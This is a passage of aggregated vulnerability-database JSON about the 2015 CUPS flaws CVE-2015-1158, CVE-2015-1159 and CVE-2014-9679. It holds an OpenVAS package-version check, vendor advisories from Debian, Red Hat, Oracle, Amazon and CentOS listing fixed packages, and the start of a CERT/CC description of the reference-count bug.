http://greenbone.net", "published": "2015-06-09T00:00:00", "title": "Debian Security Advisory DSA 3283-1 (cups - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703283", "id": "OPENVAS:703283", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3283.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3283-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703283);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_name(\"Debian Security Advisory DSA 3283-1 (cups - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-06-09 00:00:00 +0200 (Tue, 09 Jun 2015)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3283.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"cups on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Common UNIX Printing System (or\nCUPS(tm)) is a printing system and general replacement for lpd and the like.\nIt supports the Internet Printing Protocol (IPP), and has its own filtering\ndriver model for handling various document types.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthese problems have been fixed in version 1.5.3-5+deb7u6.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.7.5-11+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.7.5-12.\n\nWe recommend that you upgrade your cups packages.\");\n script_tag(name: \"summary\", value: \"It was discovered that CUPS, the\nCommon UNIX Printing System, is vulnerable to a remotely triggerable privilege\nescalation via cross-site scripting and bad print job submission used to replace\ncupsd.conf on the CUPS server.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcups2:amd64\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcups2:i386\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupscgi1:amd64\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupscgi1:i386\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsdriver1:amd64\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsdriver1:i386\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2:amd64\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2:i386\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsmime1:amd64\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsmime1:i386\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsppdc1:amd64\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsppdc1:i386\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.5.3-5+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T19:43:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.4.2-67.el6_6.1.i686.rpm", "operator": "lt"}], "description": "CUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An \nattacker could use this flaw to bypass the default configuration settings \nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and \nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n", "reporter": "RedHat", "published": "2015-06-17T04:00:00", "type": "redhat", "title": "(RHSA-2015:1123) Important: cups security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:10", "id": "RHSA-2015:1123", "href": "https://access.redhat.com/errata/RHSA-2015:1123", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:44:54", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageFilename": "cups-1.4.2-67.el6_6.1.x86_64.rpm", "packageName": "cups", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageFilename": "cups-devel-1.4.2-67.el6_6.1.i686.rpm", "packageName": "cups-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageFilename": "cups-devel-1.4.2-67.el6_6.1.i686.rpm", "packageName": "cups-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageFilename": "cups-devel-1.6.3-17.el7_1.1.x86_64.rpm", "packageName": "cups-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageFilename": "cups-libs-1.4.2-67.el6_6.1.i686.rpm", "packageName": "cups-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageFilename": "cups-libs-1.4.2-67.el6_6.1.i686.rpm", "packageName": "cups-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageFilename": "cups-libs-1.4.2-67.el6_6.1.x86_64.rpm", "packageName": "cups-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "noarch", "packageFilename": "cups-filesystem-1.6.3-17.el7_1.1.noarch.rpm", "packageName": "cups-filesystem", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageFilename": "cups-1.6.3-17.el7_1.1.x86_64.rpm", "packageName": "cups", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageFilename": "cups-lpd-1.4.2-67.el6_6.1.x86_64.rpm", "packageName": "cups-lpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "src", "packageFilename": "cups-1.4.2-67.el6_6.1.src.rpm", "packageName": "cups", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "src", "packageFilename": "cups-1.4.2-67.el6_6.1.src.rpm", "packageName": "cups", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageFilename": "cups-client-1.6.3-17.el7_1.1.x86_64.rpm", "packageName": "cups-client", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "src", "packageFilename": "cups-1.6.3-17.el7_1.1.src.rpm", "packageName": "cups", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "i686", "packageFilename": "cups-libs-1.6.3-17.el7_1.1.i686.rpm", "packageName": "cups-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageFilename": "cups-lpd-1.6.3-17.el7_1.1.x86_64.rpm", "packageName": "cups-lpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageFilename": "cups-ipptool-1.6.3-17.el7_1.1.x86_64.rpm", "packageName": "cups-ipptool", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageFilename": "cups-libs-1.6.3-17.el7_1.1.x86_64.rpm", "packageName": "cups-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageFilename": "cups-devel-1.4.2-67.el6_6.1.x86_64.rpm", "packageName": "cups-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageFilename": "cups-php-1.4.2-67.el6_6.1.x86_64.rpm", "packageName": "cups-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageFilename": "cups-php-1.4.2-67.el6_6.1.i686.rpm", "packageName": "cups-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "i686", "packageFilename": "cups-devel-1.6.3-17.el7_1.1.i686.rpm", "packageName": "cups-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageFilename": "cups-lpd-1.4.2-67.el6_6.1.i686.rpm", "packageName": "cups-lpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageFilename": "cups-1.4.2-67.el6_6.1.i686.rpm", "packageName": "cups", "operator": "lt"}], "description": "[1:1.4.2-67.1]\n- CVE-2015-1158, CVE-2015-1159, CVE-2014-9679 (bug #1229982).", "edition": 3, "reporter": "Oracle", "published": "2015-06-17T00:00:00", "title": "cups security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-17T00:00:00", "id": "ELSA-2015-1123", "href": "http://linux.oracle.com/errata/ELSA-2015-1123.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:09", "references": ["https://rhn.redhat.com/errata/RHSA-2015-1123.html"], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "i686", "packageFilename": "cups-php-1.4.2-67.21.amzn1.i686.rpm", "packageName": "cups-php", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "x86_64", "packageFilename": "cups-1.4.2-67.21.amzn1.x86_64.rpm", "packageName": "cups", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "x86_64", "packageFilename": "cups-devel-1.4.2-67.21.amzn1.x86_64.rpm", "packageName": "cups-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "x86_64", "packageFilename": "cups-php-1.4.2-67.21.amzn1.x86_64.rpm", "packageName": "cups-php", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "i686", "packageFilename": "cups-1.4.2-67.21.amzn1.i686.rpm", "packageName": "cups", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "src", "packageFilename": "cups-1.4.2-67.21.amzn1.src.rpm", "packageName": "cups", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "i686", "packageFilename": "cups-lpd-1.4.2-67.21.amzn1.i686.rpm", "packageName": "cups-lpd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "x86_64", "packageFilename": "cups-debuginfo-1.4.2-67.21.amzn1.x86_64.rpm", "packageName": "cups-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "i686", "packageFilename": "cups-devel-1.4.2-67.21.amzn1.i686.rpm", "packageName": "cups-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "i686", "packageFilename": "cups-libs-1.4.2-67.21.amzn1.i686.rpm", "packageName": "cups-libs", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "x86_64", "packageFilename": "cups-libs-1.4.2-67.21.amzn1.x86_64.rpm", "packageName": "cups-libs", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "x86_64", "packageFilename": "cups-lpd-1.4.2-67.21.amzn1.x86_64.rpm", "packageName": "cups-lpd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.4.2-67.21.amzn1", "arch": "i686", "packageFilename": "cups-debuginfo-1.4.2-67.21.amzn1.i686.rpm", "packageName": "cups-debuginfo", "operator": "lt"}], "description": "**Issue Overview:**\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server ([CVE-2015-1158 __](<https://access.redhat.com/security/cve/CVE-2015-1158>))\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. ([CVE-2015-1159 __](<https://access.redhat.com/security/cve/CVE-2015-1159>))\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially-crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash. ([CVE-2014-9679 __](<https://access.redhat.com/security/cve/CVE-2014-9679>))\n\n \n**Affected Packages:** \n\n\ncups\n\n \n**Issue Correction:** \nRun _yum update cups_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n cups-debuginfo-1.4.2-67.21.amzn1.i686 \n cups-libs-1.4.2-67.21.amzn1.i686 \n cups-php-1.4.2-67.21.amzn1.i686 \n cups-devel-1.4.2-67.21.amzn1.i686 \n cups-1.4.2-67.21.amzn1.i686 \n cups-lpd-1.4.2-67.21.amzn1.i686 \n \n src: \n cups-1.4.2-67.21.amzn1.src \n \n x86_64: \n cups-debuginfo-1.4.2-67.21.amzn1.x86_64 \n cups-php-1.4.2-67.21.amzn1.x86_64 \n cups-libs-1.4.2-67.21.amzn1.x86_64 \n cups-devel-1.4.2-67.21.amzn1.x86_64 \n cups-1.4.2-67.21.amzn1.x86_64 \n cups-lpd-1.4.2-67.21.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2015-07-07T22:26:00", "title": "Medium: cups", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:09", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-07-07T22:26:00", "id": "ALAS-2015-559", "href": "https://alas.aws.amazon.com/ALAS-2015-559.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:25:02", "references": ["https://rhn.redhat.com/errata/RHSA-2015-1123.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "i686", "packageName": "cups-devel", "packageFilename": "cups-devel-1.6.3-17.el7_1.1.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageName": "cups", "packageFilename": "cups-1.6.3-17.el7_1.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageName": "cups-lpd", "packageFilename": "cups-lpd-1.6.3-17.el7_1.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageName": "cups-php", "packageFilename": "cups-php-1.4.2-67.el6_6.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "i686", "packageName": "cups-libs", "packageFilename": "cups-libs-1.6.3-17.el7_1.1.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageName": "cups-libs", "packageFilename": "cups-libs-1.6.3-17.el7_1.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageName": "cups-devel", "packageFilename": "cups-devel-1.4.2-67.el6_6.1.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageName": "cups-devel", "packageFilename": "cups-devel-1.4.2-67.el6_6.1.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageName": "cups-devel", "packageFilename": "cups-devel-1.4.2-67.el6_6.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageName": "cups-lpd", "packageFilename": "cups-lpd-1.4.2-67.el6_6.1.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageName": "cups-ipptool", "packageFilename": "cups-ipptool-1.6.3-17.el7_1.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "any", "packageName": "cups", "packageFilename": "cups-1.4.2-67.el6_6.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "noarch", "packageName": "cups-filesystem", "packageFilename": "cups-filesystem-1.6.3-17.el7_1.1.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "any", "packageName": "cups", "packageFilename": "cups-1.6.3-17.el7_1.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageName": "cups", "packageFilename": "cups-1.4.2-67.el6_6.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageName": "cups-devel", "packageFilename": "cups-devel-1.6.3-17.el7_1.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.6.3-17.el7_1.1", "arch": "x86_64", "packageName": "cups-client", "packageFilename": "cups-client-1.6.3-17.el7_1.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageName": "cups-libs", "packageFilename": "cups-libs-1.4.2-67.el6_6.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageName": "cups", "packageFilename": "cups-1.4.2-67.el6_6.1.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageName": "cups-libs", "packageFilename": "cups-libs-1.4.2-67.el6_6.1.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageName": "cups-libs", "packageFilename": "cups-libs-1.4.2-67.el6_6.1.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "x86_64", "packageName": "cups-lpd", "packageFilename": "cups-lpd-1.4.2-67.el6_6.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.4.2-67.el6_6.1", "arch": "i686", "packageName": "cups-php", "packageFilename": "cups-php-1.4.2-67.el6_6.1.i686.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2015:1123\n\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An \nattacker could use this flaw to bypass the default configuration settings \nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and \nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\n\n**Affected packages:**\ncups\ncups-client\ncups-devel\ncups-filesystem\ncups-ipptool\ncups-libs\ncups-lpd\ncups-php\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1123.html", "edition": 1, "reporter": "CentOS Project", "published": "2015-06-18T11:29:43", "title": "cups security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-18T11:30:45", "href": "http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html", "id": "CESA-2015:1123", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2018-09-05T16:45:32", "references": ["http://cwe.mitre.org/data/definitions/79.html", "http://www.cups.org/blog.php?L1082+I0+Q", "http://www.cups.org/blog.php?L1082+I0+Q", "http://cwe.mitre.org/data/definitions/911.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1159", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1158", "https://www.cups.org/str.php?L4609"], "description": "### Overview\n\nCUPS implements the Internet Printing Protocol (IPP) for UNIX-derived operating systems. Various versions of CUPS are vulnerable to a privilege escalation due to a memory management error.\n\n### Description\n\n[**CWE-911**](<http://cwe.mitre.org/data/definitions/911.html>)**: Improper Update of Reference Count - **CVE-2015-1158 \n\nAn issue with how localized strings are handled in `cupsd` allows a reference counter to over-decrement when handling certain print job request errors. As a result, an attacker can prematurely free an arbitrary string of global scope, creating a dangling pointer to a repurposed block of memory 